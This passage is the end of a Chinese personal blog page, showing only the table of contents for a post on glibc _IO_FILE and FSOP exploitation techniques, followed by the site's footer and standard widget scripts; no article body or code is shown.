    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E7%8E%AF%E5%A2%83"><span class="toc-text">利用环境</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#IO-FILE"><span class="toc-text">_IO_FILE</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%BB%E8%A6%81%E5%87%BD%E6%95%B0%E5%8A%9F%E8%83%BD%E4%BB%8B%E7%BB%8D"><span class="toc-text">主要函数功能介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%BB%E8%A6%81%E7%BB%93%E6%9E%84%E4%BD%93%E4%BB%8B%E7%BB%8D"><span class="toc-text">主要结构体介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%89%8B%E6%B3%95"><span class="toc-text">利用手法</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E5%88%A9%E7%94%A8-fileno"><span class="toc-text">一、利用_fileno</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E5%8A%AB%E6%8C%81%E6%96%87%E4%BB%B6%E6%B5%81"><span class="toc-text">二、劫持文件流</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%89%E3%80%81%E5%88%A9%E7%94%A8stdout%E6%B3%84%E9%9C%B2libc"><span class="toc-text">三、利用stdout泄露libc</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9B%9B%E3%80%81%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%86%99"><span class="toc-text">四、任意读写</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#stdout%E6%A0%87%E5%87%86%E8%BE%93%E5%85%A5%E7%BC%93%E5%86%B2%E5%8C%BA%E8%BF%9B%E8%A1%8C%E4%BB%BB%E6%84%8F%E5%9C%B0%E5%9D%80%E8%AF%BB%E5%86%99"><span class="toc-text">stdout标准输入缓冲区进行任意地址读写</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%BB%E6%84%8F%E5%86%99"><span class="toc-text">任意写</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%BB%E6%84%8F%E8%AF%BB"><span class="toc-text">任意读</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BA%94%E3%80%81FSOP"><span class="toc-text">五、FSOP</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%AB%98%E7%89%88%E6%9C%AC%E7%9A%84%E4%B8%8B%E7%9A%84FSOP"><span class="toc-text">高版本的下的FSOP</span></a></li></ol></li></ol></li></ol>
  </aside>

        
      </div>
    </div>
  </div>
</main>
  

<footer class="footer">
  <div class="footer-social"><a 
        href="tencent://message/?Menu=yes&uin=1145020611 "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#12B7F5'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconQQ "></i>
      </a><a 
        href="javascript:; "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#09BB07'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconwechat-fill "></i>
      </a><a 
        href="https://www.instagram.com/izhaoo/ "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#DA2E76'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconinstagram "></i>
      </a><a 
        href="https://shoucheng3.github.io "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#9f7be1'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  icongithub-fill "></i>
      </a><a 
        href="mailto:1145020611@qq.com "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color=#FF3B00" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconmail"></i>
      </a></div>
  
    <div class="footer-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
  
</footer>
  
      <div class="fab fab-plus">
    <i class="iconfont iconplus"></i>
  </div>
  
    <div class="fab fab-daovoice">
      <i class="iconfont iconcomment"></i>
    </div>
  
  
    <a href="https://support.qq.com/product/325288# app_id" target="_blank">
      <div class="fab fab-tencent-chao">
        <i class="iconfont iconcomment"></i>
      </div>
    </a>
  
  <div class="fab fab-up">
    <i class="iconfont iconcaret-up"></i>
  </div>
  
  
  
    
<script src="/js/color-mode.js"></script>

  
  
    <div class="search">
  <div class="search-container">
    <div class="search-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <div class="search-input-wrapper">
      <i class="search-input-icon iconfont iconsearch"></i>
      <input class="search-input" type="search" id="search-input" placeholder="Search..." autofocus autocomplete="off"
        autocorrect="off" autocapitalize="off">
    </div>
    <div class="search-output" id="search-output"></div>
  </div>
</div>
  
</body>

<script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>



  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js"></script>




  
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.js"></script>






  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.qrcode/1.0/jquery.qrcode.min.js"></script>




<script src="/js/utils.js"></script>
<script src="/js/script.js"></script>





  

<script>
  (function (i, s, o, g, r, a, m) {
    i["DaoVoiceObject"] = r;
    i[r] = i[r] || function () {
      (i[r].q = i[r].q || []).push(arguments)
    }, i[r].l = 1 * new Date();
    a = s.createElement(o), m = s.getElementsByTagName(o)[0];
    a.async = 1;
    a.src = g;
    a.charset = "utf-8";
    m.parentNode.insertBefore(a, m)
  })(window, document, "script", "https://widget.daovoice.io/widget/0f81ff2f.js", "daovoice")
  daovoice('init', {
    app_id: "3abd194f# app_id"
  }, {
    launcher: {
      disableLauncherIcon: true,
    },
  });
  daovoice('update');
</script>



  <script>
    (function () {
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
      } else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
      }
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>













</html>